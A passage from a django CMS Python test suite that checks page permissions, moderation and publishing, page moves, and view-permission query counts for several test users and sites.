2. `master`: user with permissions to all applications
3. `slave`: user assigned to page `slave-home`
Pages:
1. `home`:
- published page
- master can do anything on its subpages, but not on home!
2. `master`:
- published page
- created by super
- `master` can do anything on it and its descendants
- subpages:
3. `slave-home`:
- not published
- assigned slave user which can add/change/delete/
move/publish this page and its descendants
- `master` user want to moderate this page and all descendants
4. `pageA`:
- created by super
- master can add/change/delete on it and descendants
"""
#TODO: Split this test case into one that tests publish functionality, and
#TODO: one that tests permission inheritance. This is too complex.
def setUp(self):
# create super user
self.user_super = self._create_user("super", is_staff=True,
is_superuser=True)
self.user_staff = self._create_user("staff", is_staff=True,
add_default_permissions=True)
self.user_master = self._create_user("master", is_staff=True,
add_default_permissions=True)
self.user_slave = self._create_user("slave", is_staff=True,
add_default_permissions=True)
self.user_normal = self._create_user("normal", is_staff=False)
self.user_normal.user_permissions.add(
Permission.objects.get(codename='publish_page'))
with self.login_user_context(self.user_super):
self.home_page = create_page("home", "nav_playground.html", "en",
created_by=self.user_super)
# master page & master user
self.master_page = create_page("master", "nav_playground.html", "en")
# create non global, non staff user
self.user_non_global = self._create_user("nonglobal")
# assign master user under home page
assign_user_to_page(self.home_page, self.user_master,
grant_on=ACCESS_DESCENDANTS, grant_all=True)
# and to master page
assign_user_to_page(self.master_page, self.user_master,
grant_on=ACCESS_PAGE_AND_DESCENDANTS, grant_all=True)
# slave page & slave user
self.slave_page = create_page("slave-home", "col_two.html", "en",
parent=self.master_page, created_by=self.user_super)
assign_user_to_page(self.slave_page, self.user_slave, grant_all=True)
# create page_b
page_b = create_page("pageB", "nav_playground.html", "en", created_by=self.user_super)
# Normal user
# it's allowed for the normal user to view the page
assign_user_to_page(page_b, self.user_normal, can_view=True)
# create page_a - sample page from master
page_a = create_page("pageA", "nav_playground.html", "en",
created_by=self.user_super)
assign_user_to_page(page_a, self.user_master,
can_add=True, can_change=True, can_delete=True, can_publish=True,
can_move_page=True)
# publish after creating all drafts
publish_page(self.home_page, self.user_super, 'en')
publish_page(self.master_page, self.user_super, 'en')
self.page_b = publish_page(page_b, self.user_super, 'en')
def _add_plugin(self, user, page):
"""
Add a plugin using the test client to check for permissions.
"""
with self.login_user_context(user):
placeholder = page.placeholders.all()[0]
post_data = {
'plugin_language': 'en',
'plugin_parent': '',
'placeholder_id': placeholder.pk,
'plugin_type': 'TextPlugin'
}
url = URL_CMS_PLUGIN_ADD
response = self.client.post(url, post_data)
self.assertEqual(response.status_code, 200)
return response.content.decode('utf8')
def test_super_can_add_page_to_root(self):
with self.login_user_context(self.user_super):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 200)
def test_master_cannot_add_page_to_root(self):
with self.login_user_context(self.user_master):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_cannot_add_page_to_root(self):
with self.login_user_context(self.user_slave):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_can_add_page_under_slave_home(self):
with self.login_user_context(self.user_slave):
# move to admin.py?
# url = URL_CMS_PAGE_ADD + "?target=%d&position=last-child" % slave_page.pk
# can he even access it over get?
# response = self.client.get(url)
# self.assertEqual(response.status_code, 200)
# add page
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page, created_by=self.user_slave)
# adds user_slave as page moderator for this page
# public model shouldn't be available yet, because of the moderation
# moderators and approval ok?
# must not have public object yet
self.assertFalse(page.publisher_public)
self.assertObjectExist(Title.objects, slug="page")
self.assertObjectDoesNotExist(Title.objects.public(), slug="page")
self.assertTrue(has_generic_permission(page.pk, self.user_slave, "publish", 1))
# publish as slave, published as user_master before
publish_page(page, self.user_slave, 'en')
# user_slave is moderator for this page
# approve / publish as user_slave
# user master should be able to approve as well
@override_settings(
CMS_PLACEHOLDER_CONF={
'col_left': {
'default_plugins': [
{
'plugin_type': 'TextPlugin',
'values': {
'body': 'Lorem ipsum dolor sit amet, consectetur adipisicing elit. Culpa, repellendus, delectus, quo quasi ullam inventore quod quam aut voluptatum aliquam voluptatibus harum officiis officia nihil minus unde accusamus dolorem repudiandae.'
},
},
]
},
},
)
def test_default_plugins(self):
with self.login_user_context(self.user_slave):
self.assertEqual(CMSPlugin.objects.count(), 0)
response = self.client.get(self.slave_page.get_absolute_url(), {'edit': 1})
self.assertEqual(response.status_code, 200)
self.assertEqual(CMSPlugin.objects.count(), 1)
def test_page_added_by_slave_can_be_published_by_user_master(self):
# add page
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page, created_by=self.user_slave)
# same as test_slave_can_add_page_under_slave_home
# must not have public object yet
self.assertFalse(page.publisher_public)
self.assertTrue(has_generic_permission(page.pk, self.user_master, "publish", page.site.pk))
# should be True user_master should have publish permissions for children as well
publish_page(self.slave_page, self.user_master, 'en')
page = publish_page(page, self.user_master, 'en')
self.assertTrue(page.publisher_public_id)
# user_master is moderator for top level page / but can't approve descendants?
# approve / publish as user_master
# user master should be able to approve descendants
def test_super_can_add_plugin(self):
self._add_plugin(self.user_super, page=self.slave_page)
def test_master_can_add_plugin(self):
self._add_plugin(self.user_master, page=self.slave_page)
def test_slave_can_add_plugin(self):
self._add_plugin(self.user_slave, page=self.slave_page)
def test_same_order(self):
# create 4 pages
slugs = []
for i in range(0, 4):
page = create_page("page", "nav_playground.html", "en",
parent=self.home_page)
slug = page.title_set.drafts()[0].slug
slugs.append(slug)
# approve last 2 pages in reverse order
for slug in reversed(slugs[2:]):
page = self.assertObjectExist(Page.objects.drafts(), title_set__slug=slug)
page = publish_page(page, self.user_master, 'en')
self.check_published_page_attributes(page)
def test_create_copy_publish(self):
# create new page to copy
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page)
# copy it under home page...
# TODO: Use page.copy_page here
with self.login_user_context(self.user_master):
copied_page = self.copy_page(page, self.home_page)
page = publish_page(copied_page, self.user_master, 'en')
self.check_published_page_attributes(page)
def test_create_publish_copy(self):
# create new page to copy
page = create_page("page", "nav_playground.html", "en",
parent=self.home_page)
page = publish_page(page, self.user_master, 'en')
# copy it under master page...
# TODO: Use page.copy_page here
with self.login_user_context(self.user_master):
copied_page = self.copy_page(page, self.master_page)
self.check_published_page_attributes(page)
copied_page = publish_page(copied_page, self.user_master, 'en')
self.check_published_page_attributes(copied_page)
def test_subtree_needs_approval(self):
# create page under slave_page
page = create_page("parent", "nav_playground.html", "en",
parent=self.home_page)
self.assertFalse(page.publisher_public)
# create subpage under page
subpage = create_page("subpage", "nav_playground.html", "en", parent=page)
self.assertFalse(subpage.publisher_public)
# publish both of them in reverse order
subpage = publish_page(subpage, self.user_master, 'en')
# subpage should not be published, because parent is not published
# yet, should be marked as `publish when parent`
self.assertFalse(subpage.publisher_public)
# publish page (parent of subage), so subpage must be published also
page = publish_page(page, self.user_master, 'en')
self.assertNotEqual(page.publisher_public, None)
# reload subpage, it was probably changed
subpage = self.reload(subpage)
# parent was published, so subpage must be also published..
self.assertNotEqual(subpage.publisher_public, None)
#check attributes
self.check_published_page_attributes(page)
self.check_published_page_attributes(subpage)
def test_subtree_with_super(self):
# create page under root
page = create_page("page", "nav_playground.html", "en")
self.assertFalse(page.publisher_public)
# create subpage under page
subpage = create_page("subpage", "nav_playground.html", "en",
parent=page)
self.assertFalse(subpage.publisher_public)
# tree id must be the same
self.assertEqual(page.path[0:4], subpage.path[0:4])
# publish both of them
page = self.reload(page)
page = publish_page(page, self.user_super, 'en')
# reload subpage, there were an path change
subpage = self.reload(subpage)
self.assertEqual(page.path[0:4], subpage.path[0:4])
subpage = publish_page(subpage, self.user_super, 'en')
# tree id must stay the same
self.assertEqual(page.path[0:4], subpage.path[0:4])
# published pages must also have the same root-path
self.assertEqual(page.publisher_public.path[0:4], subpage.publisher_public.path[0:4])
#check attributes
self.check_published_page_attributes(page)
self.check_published_page_attributes(subpage)
def test_super_add_page_to_root(self):
"""Create page which is not under moderation in root, and check if
some properties are correct.
"""
# create page under root
page = create_page("page", "nav_playground.html", "en")
# public must not exist
self.assertFalse(page.publisher_public)
def test_moderator_flags(self):
"""Add page under slave_home and check its flag
"""
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page)
# No public version
self.assertIsNone(page.publisher_public)
self.assertFalse(page.publisher_public_id)
# check publish box
page = publish_page(page, self.user_slave, 'en')
# public page must not exist because of parent
self.assertFalse(page.publisher_public)
# waiting for parents
self.assertEqual(page.get_publisher_state('en'), PUBLISHER_STATE_PENDING)
# publish slave page
self.slave_page = self.slave_page.reload()
slave_page = publish_page(self.slave_page, self.user_master, 'en')
self.assertFalse(page.publisher_public)
self.assertTrue(slave_page.publisher_public)
def test_plugins_get_published(self):
# create page under root
page = create_page("page", "nav_playground.html", "en")
placeholder = page.placeholders.all()[0]
add_plugin(placeholder, "TextPlugin", "en", body="test")
# public must not exist
self.assertEqual(CMSPlugin.objects.all().count(), 1)
publish_page(page, self.user_super, 'en')
self.assertEqual(CMSPlugin.objects.all().count(), 2)
def test_remove_plugin_page_under_moderation(self):
# login as slave and create page
page = create_page("page", "nav_playground.html", "en", parent=self.slave_page)
# add plugin
placeholder = page.placeholders.all()[0]
plugin = add_plugin(placeholder, "TextPlugin", "en", body="test")
# publish page
page = self.reload(page)
page = publish_page(page, self.user_slave, 'en')
# only the draft plugin should exist
self.assertEqual(CMSPlugin.objects.all().count(), 1)
# page should require approval
self.assertEqual(page.get_publisher_state('en'), PUBLISHER_STATE_PENDING)
# master approves and publishes the page
# first approve slave-home
slave_page = self.reload(self.slave_page)
publish_page(slave_page, self.user_master, 'en')
page = self.reload(page)
page = publish_page(page, self.user_master, 'en')
# draft and public plugins should now exist
self.assertEqual(CMSPlugin.objects.all().count(), 2)
# login as slave and delete the plugin - should require moderation
with self.login_user_context(self.user_slave):
plugin_data = {
'plugin_id': plugin.pk
}
remove_url = URL_CMS_PLUGIN_REMOVE + "%s/" % plugin.pk
response = self.client.post(remove_url, plugin_data)
self.assertEqual(response.status_code, 302)
# there should only be a public plugin - since the draft has been deleted
self.assertEqual(CMSPlugin.objects.all().count(), 1)
page = self.reload(page)
# login as super user and approve/publish the page
publish_page(page, self.user_super, 'en')
# there should now be 0 plugins
self.assertEqual(CMSPlugin.objects.all().count(), 0)
def test_superuser_can_view(self):
url = self.page_b.get_absolute_url(language='en')
with self.login_user_context(self.user_super):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_staff_can_view(self):
url = self.page_b.get_absolute_url(language='en')
all_view_perms = PagePermission.objects.filter(can_view=True)
# verifiy that the user_staff has access to this page
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_staff:
has_perm = True
self.assertEqual(has_perm, False)
login_ok = self.client.login(username=getattr(self.user_staff, get_user_model().USERNAME_FIELD),
password=getattr(self.user_staff, get_user_model().USERNAME_FIELD))
self.assertTrue(login_ok)
# really logged in
self.assertTrue('_auth_user_id' in self.client.session)
login_user_id = self.client.session.get('_auth_user_id')
user = get_user_model().objects.get(pk=self.user_staff.pk)
self.assertEqual(str(login_user_id), str(user.id))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_user_normal_can_view(self):
url = self.page_b.get_absolute_url(language='en')
all_view_perms = PagePermission.objects.filter(can_view=True)
# verifiy that the normal_user has access to this page
normal_has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_normal:
normal_has_perm = True
self.assertTrue(normal_has_perm)
with self.login_user_context(self.user_normal):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
# verifiy that the user_non_global has not access to this page
non_global_has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_non_global:
non_global_has_perm = True
self.assertFalse(non_global_has_perm)
with self.login_user_context(self.user_non_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
# non logged in user
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_user_globalpermission(self):
# Global user
user_global = self._create_user("global")
with self.login_user_context(self.user_super):
user_global = create_page_user(user_global, user_global)
user_global.is_staff = False
user_global.save() # Prevent is_staff permission
global_page = create_page("global", "nav_playground.html", "en",
published=True)
# Removed call since global page user doesn't have publish permission
#global_page = publish_page(global_page, user_global)
# it's allowed for the normal user to view the page
assign_user_to_page(global_page, user_global,
global_permission=True, can_view=True)
url = global_page.get_absolute_url('en')
all_view_perms = PagePermission.objects.filter(can_view=True)
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b and perm.user == user_global:
has_perm = True
self.assertEqual(has_perm, False)
global_page_perm_q = Q(user=user_global) & Q(can_view=True)
global_view_perms = GlobalPagePermission.objects.filter(global_page_perm_q).exists()
self.assertEqual(global_view_perms, True)
# user_global
with self.login_user_context(user_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
# self.non_user_global
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b and perm.user == self.user_non_global:
has_perm = True
self.assertEqual(has_perm, False)
global_page_perm_q = Q(user=self.user_non_global) & Q(can_view=True)
global_view_perms = GlobalPagePermission.objects.filter(global_page_perm_q).exists()
self.assertEqual(global_view_perms, False)
with self.login_user_context(self.user_non_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_anonymous_user_public_for_all(self):
url = self.page_b.get_absolute_url('en')
with self.settings(CMS_PUBLIC_FOR='all'):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_anonymous_user_public_for_none(self):
# default of when to show pages to anonymous user doesn't take
# global permissions into account
url = self.page_b.get_absolute_url('en')
with self.settings(CMS_PUBLIC_FOR=None):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
@override_settings(CMS_PERMISSION=True)
class PatricksMoveTest(CMSTestCase):
"""
Fixtures contains 3 users and 1 published page and some other stuff
Users:
1. `super`: superuser
2. `master`: user with permissions to all applications
3. `slave`: user assigned to page `slave-home`
Pages:
1. `home`:
- published page
- master can do anything on its subpages, but not on home!
2. `master`:
- published page
- crated by super
- `master` can do anything on it and its descendants
- subpages:
3. `slave-home`:
- not published
- assigned slave user which can add/change/delete/
move/publish/moderate this page and its descendants
- `master` user want to moderate this page and all descendants
4. `pageA`:
- created by super
- master can add/change/delete on it and descendants
"""
def setUp(self):
# create super user
self.user_super = self._create_user("super", True, True)
with self.login_user_context(self.user_super):
self.home_page = create_page("home", "nav_playground.html", "en",
created_by=self.user_super)
# master page & master user
self.master_page = create_page("master", "nav_playground.html", "en")
# create master user
self.user_master = self._create_user("master", True)
self.user_master.user_permissions.add(Permission.objects.get(codename='publish_page'))
#self.user_master = create_page_user(self.user_super, master, grant_all=True)
# assign master user under home page
assign_user_to_page(self.home_page, self.user_master,
grant_on=ACCESS_DESCENDANTS, grant_all=True)
# and to master page
assign_user_to_page(self.master_page, self.user_master, grant_all=True)
# slave page & slave user
self.slave_page = create_page("slave-home", "nav_playground.html", "en",
parent=self.master_page, created_by=self.user_super)
slave = self._create_user("slave", True)
self.user_slave = create_page_user(self.user_super, slave, can_add_page=True,
can_change_page=True, can_delete_page=True)
assign_user_to_page(self.slave_page, self.user_slave, grant_all=True)
# create page_a - sample page from master
page_a = create_page("pageA", "nav_playground.html", "en",
created_by=self.user_super)
assign_user_to_page(page_a, self.user_master,
can_add=True, can_change=True, can_delete=True, can_publish=True,
can_move_page=True)
# publish after creating all drafts
publish_page(self.home_page, self.user_super, 'en')
publish_page(self.master_page, self.user_super, 'en')
with self.login_user_context(self.user_slave):
# all of them are under moderation...
self.pa = create_page("pa", "nav_playground.html", "en", parent=self.slave_page)
self.pb = create_page("pb", "nav_playground.html", "en", parent=self.pa, position="right")
self.pc = create_page("pc", "nav_playground.html", "en", parent=self.pb, position="right")
self.pd = create_page("pd", "nav_playground.html", "en", parent=self.pb)
self.pe = create_page("pe", "nav_playground.html", "en", parent=self.pd, position="right")
self.pf = create_page("pf", "nav_playground.html", "en", parent=self.pe)
self.pg = create_page("pg", "nav_playground.html", "en", parent=self.pf, position="right")
self.ph = create_page("ph", "nav_playground.html", "en", parent=self.pf, position="right")
self.assertFalse(self.pg.publisher_public)
# login as master for approval
self.slave_page = self.slave_page.reload()
publish_page(self.slave_page, self.user_master, 'en')
# publish and approve them all
publish_page(self.pa, self.user_master, 'en')
publish_page(self.pb, self.user_master, 'en')
publish_page(self.pc, self.user_master, 'en')
publish_page(self.pd, self.user_master, 'en')
publish_page(self.pe, self.user_master, 'en')
publish_page(self.pf, self.user_master, 'en')
publish_page(self.pg, self.user_master, 'en')
publish_page(self.ph, self.user_master, 'en')
self.reload_pages()
def reload_pages(self):
self.pa = self.pa.reload()
self.pb = self.pb.reload()
self.pc = self.pc.reload()
self.pd = self.pd.reload()
self.pe = self.pe.reload()
self.pf = self.pf.reload()
self.pg = self.pg.reload()
self.ph = self.ph.reload()
def test_patricks_move(self):
"""
Tests permmod when moving trees of pages.
1. build following tree (master node is approved and published)
slave-home
/ | \
A B C
/ \
D E
/ | \
F G H
2. perform move operations:
1. move G under C
2. move E under G
slave-home
/ | \
A B C
/ \
D G
\
E
/ \
F H
3. approve nodes in following order:
1. approve H
2. approve G
3. approve E
4. approve F
"""
# TODO: this takes 5 seconds to run on my MBP. That's TOO LONG!
self.assertEqual(self.pg.parent_id, self.pe.pk)
self.assertEqual(self.pg.publisher_public.parent_id, self.pe.publisher_public_id)
# perform moves under slave...
self.move_page(self.pg, self.pc)
self.reload_pages()
# Draft page is now under PC
self.assertEqual(self.pg.parent_id, self.pc.pk)
# Public page is under PC
self.assertEqual(self.pg.publisher_public.parent_id, self.pc.publisher_public_id)
self.assertEqual(self.pg.publisher_public.parent.get_absolute_url(),
self.pc.publisher_public.get_absolute_url())
self.assertEqual(self.pg.get_absolute_url(), self.pg.publisher_public.get_absolute_url())
self.move_page(self.pe, self.pg)
self.reload_pages()
self.assertEqual(self.pe.parent_id, self.pg.pk)
self.assertEqual(self.pe.publisher_public.parent_id, self.pg.publisher_public_id)
self.ph = self.ph.reload()
# check urls - they should stay be the same now after the move
self.assertEqual(
self.pg.publisher_public.get_absolute_url(),
self.pg.get_absolute_url()
)
self.assertEqual(
self.ph.publisher_public.get_absolute_url(),
self.ph.get_absolute_url()
)
# public parent check after move
self.assertEqual(self.pg.publisher_public.parent.pk, self.pc.publisher_public_id)
self.assertEqual(self.pe.publisher_public.parent.pk, self.pg.publisher_public_id)
self.assertEqual(self.ph.publisher_public.parent.pk, self.pe.publisher_public_id)
# check if urls are correct after move
self.assertEqual(
self.pg.publisher_public.get_absolute_url(),
u'%smaster/slave-home/pc/pg/' % self.get_pages_root()
)
self.assertEqual(
self.ph.publisher_public.get_absolute_url(),
u'%smaster/slave-home/pc/pg/pe/ph/' % self.get_pages_root()
)
class ModeratorSwitchCommandTest(CMSTestCase):
def test_switch_moderator_on(self):
with force_language("en"):
pages_root = unquote(reverse("pages-root"))
page1 = create_page('page', 'nav_playground.html', 'en', published=True)
with disable_logger(log):
call_command('cms', 'moderator', 'on')
with force_language("en"):
path = page1.get_absolute_url()[len(pages_root):].strip('/')
page2 = get_page_from_path(path)
self.assertEqual(page1.get_absolute_url(), page2.get_absolute_url())
def test_table_name_patching(self):
"""
This tests the plugin models patching when publishing from the command line
"""
self.get_superuser()
create_page("The page!", "nav_playground.html", "en", published=True)
draft = Page.objects.drafts()[0]
draft.reverse_id = 'a_test' # we have to change *something*
draft.save()
add_plugin(draft.placeholders.get(slot=u"body"),
u"TextPlugin", u"en", body="Test content")
draft.publish('en')
add_plugin(draft.placeholders.get(slot=u"body"),
u"TextPlugin", u"en", body="Test content")
# Manually undoing table name patching
Text._meta.db_table = 'djangocms_text_ckeditor_text'
plugin_pool.patched = False
with disable_logger(log):
call_command('cms', 'moderator', 'on')
# Sanity check the database (we should have one draft and one public)
not_drafts = len(Page.objects.filter(publisher_is_draft=False))
drafts = len(Page.objects.filter(publisher_is_draft=True))
self.assertEqual(not_drafts, 1)
self.assertEqual(drafts, 1)
def test_switch_moderator_off(self):
with force_language("en"):
pages_root = unquote(reverse("pages-root"))
page1 = create_page('page', 'nav_playground.html', 'en', published=True)
path = page1.get_absolute_url()[len(pages_root):].strip('/')
page2 = get_page_from_path(path)
self.assertIsNotNone(page2)
self.assertEqual(page1.get_absolute_url(), page2.get_absolute_url())
def tearDown(self):
plugin_pool.patched = False
plugin_pool.set_plugin_meta()
class ViewPermissionBaseTests(CMSTestCase):
def setUp(self):
self.page = create_page('testpage', 'nav_playground.html', 'en')
def get_request(self, user=None):
attrs = {
'user': user or AnonymousUser(),
'REQUEST': {},
'POST': {},
'GET': {},
'session': {},
}
return type('Request', (object,), attrs)
@override_settings(
CMS_PERMISSION=False,
CMS_PUBLIC_FOR='staff',
)
class BasicViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to false, as this is the
normal use case
"""
@override_settings(CMS_PUBLIC_FOR="all")
def test_unauth_public(self):
request = self.get_request()
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
def test_unauth_non_access(self):
request = self.get_request()
with self.assertNumQueries(0):
self.assertFalse(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[])
@override_settings(CMS_PUBLIC_FOR="all")
def test_staff_public_all(self):
request = self.get_request(self.get_staff_user_with_no_permissions())
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
def test_staff_public_staff(self):
request = self.get_request(self.get_staff_user_with_no_permissions())
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
@override_settings(CMS_PUBLIC_FOR="none")
def test_staff_basic_auth(self):
request = self.get_request(self.get_staff_user_with_no_permissions())
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
@override_settings(CMS_PUBLIC_FOR="none")
def test_normal_basic_auth(self):
request = self.get_request(self.get_standard_user())
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request))
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
@override_settings(
CMS_PERMISSION=True,
CMS_PUBLIC_FOR='none'
)
class UnrestrictedViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to True but no restrictions
apply to this specific page
"""
def test_unauth_non_access(self):
request = self.get_request()
with self.assertNumQueries(1):
"""
The query is:
PagePermission query for the affected page (is the page restricted?)
"""
self.assertFalse(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertFalse(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[])
def test_global_access(self):
user = self.get_standard_user()
GlobalPagePermission.objects.create(can_view=True, user=user)
request = self.get_request(user)
with self.assertNumQueries(2):
"""The queries are:
PagePermission query for the affected page (is the page restricted?)
GlobalPagePermission query for the page site
"""
self.assertTrue(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[self.page.pk])
def test_normal_denied(self):
request = self.get_request(self.get_standard_user())
with self.assertNumQueries(4):
"""
The queries are:
PagePermission query for the affected page (is the page restricted?)
GlobalPagePermission query for the page site
User permissions query
Content type query
"""
self.assertFalse(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertFalse(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, [self.page], self.page.site),
[])
@override_settings(
CMS_PERMISSION=True,
CMS_PUBLIC_FOR='all'
)
class RestrictedViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to True and view restrictions
apply to this specific page
"""
def setUp(self):
super(RestrictedViewPermissionTests, self).setUp()
self.group = Group.objects.create(name='testgroup')
self.pages = [self.page]
self.expected = [self.page.pk]
PagePermission.objects.create(page=self.page, group=self.group, can_view=True, grant_on=ACCESS_PAGE)
def test_unauthed(self):
request = self.get_request()
with self.assertNumQueries(1):
"""The queries are:
PagePermission query for the affected page (is the page restricted?)
"""
self.assertFalse(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertFalse(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
[])
def test_page_permissions(self):
user = self.get_standard_user()
request = self.get_request(user)
PagePermission.objects.create(can_view=True, user=user, page=self.page, grant_on=ACCESS_PAGE)
with self.assertNumQueries(3):
"""
The queries are:
PagePermission query (is this page restricted)
GlobalpagePermission query for user
PagePermission query for this user
"""
self.assertTrue(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
self.expected)
def test_page_group_permissions(self):
user = self.get_standard_user()
user.groups.add(self.group)
request = self.get_request(user)
with self.assertNumQueries(3):
self.assertTrue(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
self.expected)
def test_global_permission(self):
user = self.get_standard_user()
GlobalPagePermission.objects.create(can_view=True, user=user)
request = self.get_request(user)
with self.assertNumQueries(2):
"""
The queries are:
PagePermission query (is this page restricted)
GlobalpagePermission query for user
"""
self.assertTrue(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
self.expected)
def test_basic_perm_denied(self):
request = self.get_request(self.get_staff_user_with_no_permissions())
with self.assertNumQueries(5):
"""
The queries are:
PagePermission query (is this page restricted)
GlobalpagePermission query for user
PagePermission query for this user
Generic django permission lookup
content type lookup by permission lookup
"""
self.assertFalse(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertFalse(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
[])
def test_basic_perm(self):
user = self.get_standard_user()
user.user_permissions.add(Permission.objects.get(codename='view_page'))
request = self.get_request(user)
with self.assertNumQueries(5):
"""
The queries are:
PagePermission query (is this page restricted)
GlobalpagePermission query for user
PagePermission query for this user
Generic django permission lookup
content type lookup by permission lookup
"""
self.assertTrue(self.page.has_view_permission(request))
with self.assertNumQueries(0):
self.assertTrue(self.page.has_view_permission(request)) # test cache
self.assertEqual(get_visible_pages(request, self.pages, self.page.site),
self.expected)
class PublicViewPermissionTests(RestrictedViewPermissionTests):
""" Run the same tests as before, but on the public page instead. """
def setUp(self):
super(PublicViewPermissionTests, self).setUp()
self.page.publish('en')
self.pages = [self.page.publisher_public]
self.expected = [self.page.publisher_public_id]
class GlobalPermissionTests(CMSTestCase):
def test_sanity_check(self):
""" Because we have a new manager, we'll do some basic checks."""
# manager is still named the same.
self.assertTrue(hasattr(GlobalPagePermission, 'objects'))
self.assertEqual(0, GlobalPagePermission.objects.all().count())
# we are correctly inheriting from BasicPagePermissionManager
self.assertTrue(hasattr(GlobalPagePermission.objects, 'with_user'))
# If we're using the new manager, we have extra methods which ensure
# This site access OR all site access.
self.assertTrue(hasattr(GlobalPagePermission.objects, 'user_has_permission'))
# these are just convienence methods for the above.
self.assertTrue(hasattr(GlobalPagePermission.objects, 'user_has_add_permission'))
self.assertTrue(hasattr(GlobalPagePermission.objects, 'user_has_change_permission'))
self.assertTrue(hasattr(GlobalPagePermission.objects, 'user_has_view_permission'))
def test_emulate_admin_index(self):
""" Call methods that emulate the adminsite instance's index.
This test was basically the reason for the new manager, in light of the
problem highlighted in ticket #1120, which asserts that giving a user
no site-specific rights when creating a GlobalPagePermission should
allow access to all sites.
"""
# create and then ignore this user.
superuser = self._create_user("super", is_staff=True, is_active=True,
is_superuser=True)
superuser.set_password("super")
superuser.save()
# create 2 staff users
SITES = [
Site.objects.get(pk=1),
Site.objects.create(domain='example2.com', name='example2.com'),
]
USERS = [
self._create_user("staff", is_staff=True, is_active=True),
self._create_user("staff_2", is_staff=True, is_active=True),
]
for user in USERS:
user.set_password('staff')
# re-use the same methods the UserPage form does.
# Note that it internally calls .save(), as we've not done so.
save_permissions({
'can_add_page': True,
'can_change_page': True,
'can_delete_page': False
}, user)
GlobalPagePermission.objects.create(can_add=True, can_change=True,
can_delete=False, user=USERS[0])
# we're querying here to ensure that even though we've created two users
# above, we should have successfully filtered to just one perm.
self.assertEqual(1, GlobalPagePermission.objects.with_user(USERS[0]).count())
# this will confirm explicit permissions still work, by adding the first
# site instance to the many2many relationship 'sites'
GlobalPagePermission.objects.create(can_add=True, can_change=True,
can_delete=False,
user=USERS[1]).sites.add(SITES[0])
self.assertEqual(1, GlobalPagePermission.objects.with_user(USERS[1]).count())
homepage = create_page(title="master", template="nav_playground.html",
language="en", in_navigation=True, slug='/')
publish_page(page=homepage, user=superuser, language='en')
with self.settings(CMS_PERMISSION=True):
# for all users, they should have access to site 1
request = RequestFactory().get(path='/', data={'site__exact': 1})
# we need a session attribute for current_site(request), which is
# used by has_page_add_permission and has_page_change_permission
request.session = {}
for user in USERS:
# has_page_add_permission and has_page_change_permission both test
# for this explicitly, to see if it's a superuser.
request.user = user
# Note, the query count is inflated by doing additional lookups
# because there's a site param in the request.
with self.assertNumQueries(FuzzyInt(6, 7)):
# PageAdmin swaps out the methods called for permissions
# if the setting is true, it makes use of cms.utils.permissions
self.assertTrue(has_page_add_permission(request))
self.assertTrue(has_page_change_permission(request))
# internally this calls PageAdmin.has_[add|change|delete]_permission()
self.assertEqual({'add': True, 'change': True, 'delete': False},
site._registry[Page].get_model_perms(request))
# can't use the above loop for this test, as we're testing that
# user 1 has access, but user 2 does not, as they are only assigned
